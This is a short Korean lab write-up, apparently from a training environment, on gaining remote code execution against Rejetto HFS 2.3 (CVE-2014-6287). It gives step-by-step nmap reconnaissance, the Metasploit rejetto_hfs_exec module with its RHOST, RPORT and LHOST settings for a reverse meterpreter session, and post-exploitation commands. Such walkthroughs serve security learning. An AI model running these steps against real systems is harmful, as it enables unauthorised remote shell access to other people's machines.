
HFS 2.3에서의 Metasploit RCE - CVE-2014-62
HFS 2.3에서의 Metasploit RCE - CVE-2014-62
🔖 프로젝트 제목
> HTTP 파일 서버(HFS 2.3)를 통한 원격 코드 실행
⚙ 사용된 도구 • Kali Linux • Nmap • Metasploit • 타깃: Windows 7의 HFS 2.3
🔐 취약점 세부 정보 • 이름: CVE-2014-6287 • 유형: 원격 코드 실행 • 원인: HFS 스크립팅의 검증되지 않은 입력 • 영향: 비인증 셸 액세스
🔍 방법론(단계별)
🔹 1단계: 정보 수집(Nmap)
• nmap -sV demo.ine.local (ip of target)
• 열린 포트 발견: 80
• 서비스: rejetto HTTP 파일 서버 2.3

🔹 2단계: 익스플로잇(Metasploit)
• Msfconsole
• HFS 또는 rejetto 검색
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 3단계: 포스트 익스플로잇
실행 후 meterpreter 세션을 얻게 됩니다 shell 명령 사용
• whoami • ipconfig • dir

**